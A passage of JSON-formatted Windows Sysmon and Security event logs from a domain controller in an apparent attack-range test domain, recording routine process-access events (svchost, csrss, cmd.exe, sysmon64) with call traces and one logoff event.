C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:57.188","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-001044B90000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:58","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220390,"ProcessID":864,"ThreadID":3836,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x45098\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-6178966$","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x45098","LogonType":"3","EventReceivedTime":"2020-08-01 07:54:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:54:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2674,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:54:08.386\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-001044B90000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+8d58|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:54:08.386","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-001044B90000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+8d58|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:54:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:54:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2675,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:54:08.386\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-001044B90000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+8e42|c:\\windows\\system32\\lsm.dll+8d96|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:54:08.386","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-001044B90000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+8e42|c:\\windows\\system32\\lsm.dll+8d96|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:54:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:54:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2676,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:54:08.386\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-001044B90000}\r\nSourceProcessId: 1140\r\nSourceThreadId: 1084\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1FA0-5F25-0000-0010FED40400}\r\nTargetProcessId: 4928\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|c:\\windows\\system32\\UBPM.dll+a711|c:\\windows\\system32\\UBPM.dll+f974|c:\\windows\\system32\\UBPM.dll+cd3c|c:\\windows\\system32\\UBPM.dll+d305|c:\\windows\\system32\\UBPM.dll+dc05|c:\\windows\\system32\\UBPM.dll+e91d|c:\\windows\\system32\\UBPM.dll+e014|c:\\windows\\system32\\UBPM.dll+115a2|c:\\windows\\system32\\EventAggregation.dll+3fae|c:\\windows\\system32\\EventAggregation.dll+3ea1|c:\\windows\\system32\\EventAggregation.dll+36c9|c:\\windows\\system32\\EventAggregation.dll+332f|c:\\windows\\system32\\EventAggregation.dll+2e28|C:\\Windows\\SYSTEM32\\ntdll.dll+64ed5|C:\\Windows\\SYSTEM32\\ntdll.dll+64bdd|C:\\Windows\\SYSTEM32\\ntdll.dll+64a40|C:\\Windows\\SYSTEM32\\ntdll.dll+45b70|C:\\Windows\\SYSTEM32\\ntdll.dll+2a073|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:54:08.386","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-001044B90000}","SourceProcessId":"1140","SourceThreadId":"1084","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1FA0-5F25-0000-0010FED40400}","TargetProcessId":"4928","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|c:\\windows\\system32\\UBPM.dll+a711|c:\\windows\\system32\\UBPM.dll+f974|c:\\windows\\system32\\UBPM.dll+cd3c|c:\\windows\\system32\\UBPM.dll+d305|c:\\windows\\system32\\UBPM.dll+dc05|c:\\windows\\system32\\UBPM.dll+e91d|c:\\windows\\system32\\UBPM.dll+e014|c:\\windows\\system32\\UBPM.dll+115a2|c:\\windows\\system32\\EventAggregation.dll+3fae|c:\\windows\\system32\\EventAggregation.dll+3ea1|c:\\windows\\system32\\EventAggregation.dll+36c9|c:\\windows\\system32\\EventAggregation.dll+332f|c:\\windows\\system32\\EventAggregation.dll+2e28|C:\\Windows\\SYSTEM32\\ntdll.dll+64ed5|C:\\Windows\\SYSTEM32\\ntdll.dll+64bdd|C:\\Windows\\SYSTEM32\\ntdll.dll+64a40|C:\\Windows\\SYSTEM32\\ntdll.dll+45b70|C:\\Windows\\SYSTEM32\\ntdll.dll+2a073|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:54:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:54:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2677,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:54:08.386\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1148\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-1FA0-5F25-0000-0010FED40400}\r\nTargetProcessId: 4928\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:54:08.386","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"1148","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-1FA0-5F25-0000-0010FED40400}","TargetProcessId":"4928","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:54:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:54:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2678,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:54:08.386\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:54:08.386","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:54:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:54:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2679,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:54:08.386\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:54:08.386","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:54:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:54:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2680,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:54:08.386\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:54:08.386","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:54:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:54:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2681,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:54:08.386\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 